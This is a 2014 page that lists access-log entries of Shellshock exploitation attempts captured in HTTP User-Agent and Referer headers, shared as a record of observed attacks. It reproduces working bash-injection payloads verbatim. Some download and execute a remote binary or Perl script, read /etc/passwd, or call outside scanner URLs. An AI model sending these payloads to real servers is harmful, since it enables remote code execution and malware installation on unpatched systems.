Access logs for the cNotes site (shellshock)
Published: 2014/10/04
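These are access log entries related to the shellshock issue that were recorded on the cNotes site. Each timestamp is the first occurrence of that access pattern.
Shellshock access attempts carried in the User-Agent header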
2014-09-26T17:37:53 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html), () { :; }; /usr/bin/wget web5.mooo.com/bashvultest
2014-09-26T22:04:55 () { :;}; /usr/bin/wget http://web5.mooo.com/bashvultest
2014-09-27T07:23:07 () { :;}; wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-wget
2014-09-27T07:23:07 () { :;}; curl http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-curl
2014-09-27T07:23:07 () { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-usr-local-bin-wget
2014-09-27T07:23:08 () { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-usr-bin-wget
2014-09-27T07:23:08 () { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-wget'
2014-09-27T07:23:09 () { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-curl'
2014-09-27T07:23:21 () { (a)=>' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-usr-local-bin-wget'
2014-09-27T07:23:21 () { (a)=>' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-usr-bin-wget'
2014-09-27T17:43:21 () { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z xxx.xxx.xxx.xxx/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"
2014-09-27T23:51:00 () { foo;};echo;/bin/cat /etc/passwd
2014-09-28T00:15:47 () { 1;}; echo -e \header:kbash-scaned2\""
2014-09-28T00:17:39 () { foo;};echo;/sbin/ifconfig
2014-09-29T03:39:19 () { :;}; /bin/bash -c \"cd /tmp;wget http://xxx.xxx.xxx.xxx/ji;curl -O /tmp/ji http://xxx.xxx.xxx.xxx/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"
2014-09-29T07:01:07 () { :;}; /bin/bash -c \"wget http://xxx.xxx.xxx.xxx/bash-count.txt\"
2014-09-29T11:56:25 () { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a
2014-09-30T07:54:07 () { :; }; echo Content-Type:text/plain; echo ; echo VULN-VULN-VULN-BASH-CGI
2014-09-30T18:12:22 () { :; }; echo; echo `echo '>>>asdf'; echo fuckasdf;echo '<<<asdf'`
2014-09-30T19:46:05 () { :;};echo;echo \8\"6ff49a7d633f829bbbfadc7c40d26bf;echo;exit"
2014-10-01T16:56:25 () { :;}; echo; /usr/bin/wget http://xxx.xxx.xxx.xxx/robots.txt?http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=BBB+-+mail.html;
Shellshock access attempts carried in the Referer header
2014-09-25T06:18:05 () { :; }; ping -c 11 xxx.xxx.xxx.xxx
2014-09-27T07:23:39 () { :;}; wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-wget
2014-09-27T07:23:40 () { :;}; curl http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-curl
2014-09-27T07:23:46 () { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-usr-local-bin-wget
2014-09-27T07:23:46 () { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-usr-bin-wget
2014-09-27T07:23:47 () { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-wget'
2014-09-27T07:23:47 () { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-curl'
2014-09-27T07:23:47 () { (a)=>' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-usr-local-bin-wget'
2014-09-27T07:23:48 () { (a)=>' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-usr-bin-wget'
2014-09-28T13:19:03 () { :;}; echo 'Shellshock: Vulnerable'
2014-09-30T19:46:05 () { :;};echo;echo \8\"6ff49a7d633f829bbbfadc7c40d26bf;echo;exit"
2014-10-01T16:56:25 () { :;}; echo; /usr/bin/wget http://xxx.xxx.xxx.xxx/robots.txt?http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=BBB+-+mail.html;
@Sam